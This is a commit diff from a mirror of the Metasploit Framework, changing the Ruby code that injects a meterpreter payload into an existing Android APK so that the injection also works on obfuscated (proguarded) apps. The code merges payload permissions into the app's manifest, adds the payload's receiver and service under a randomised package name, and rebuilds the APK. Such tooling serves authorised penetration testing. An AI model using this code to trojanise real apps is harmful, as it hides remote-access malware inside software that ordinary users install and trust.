infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #7584, fix apk injection into proguarded apks

bug/bundler_fix
Brent Cook 2017-01-11 12:45:23 -06:00
parent c6f5690229 daae46d37b
commit b28f600aea
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 9 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
lib/msf/core/payload/apk.rb
View File

@ -68,7 +68,7 @@ class Msf::Payload::Apk
} }
end end
def fix_manifest(tempdir) def fix_manifest(tempdir, package)
#Load payload's manifest #Load payload's manifest
payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml") payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
payload_permissions = payload_manifest.xpath("//manifest/uses-permission") payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
@ -98,8 +98,12 @@ class Msf::Payload::Apk
end end
application = original_manifest.at_xpath('/manifest/application') application = original_manifest.at_xpath('/manifest/application')
application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml receiver = payload_manifest.at_xpath('/manifest/application/receiver')
application << payload_manifest.at_xpath('/manifest/application/service').to_xml service = payload_manifest.at_xpath('/manifest/application/service')
receiver.attributes["name"].value = package + receiver.attributes["name"].value
service.attributes["name"].value = package + service.attributes["name"].value
application << receiver.to_xml
application << service.to_xml
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml } File.open("#{tempdir}/original/AndroidManifest.xml", "wb") { |file| file.puts original_manifest.to_xml }
end end
@ -207,6 +211,7 @@ class Msf::Payload::Apk
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
package = amanifest.xpath("//manifest").first['package'] package = amanifest.xpath("//manifest").first['package']
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
package_slash = package.gsub(/\./, "/") package_slash = package.gsub(/\./, "/")
print_status "Adding payload as package #{package}\n" print_status "Adding payload as package #{package}\n"
payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali") payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
@ -232,7 +237,7 @@ class Msf::Payload::Apk
injected_apk = "#{tempdir}/output.apk" injected_apk = "#{tempdir}/output.apk"
aligned_apk = "#{tempdir}/aligned.apk" aligned_apk = "#{tempdir}/aligned.apk"
print_status "Poisoning the manifest with meterpreter permissions..\n" print_status "Poisoning the manifest with meterpreter permissions..\n"
fix_manifest(tempdir) fix_manifest(tempdir, package)
print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" print_status "Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")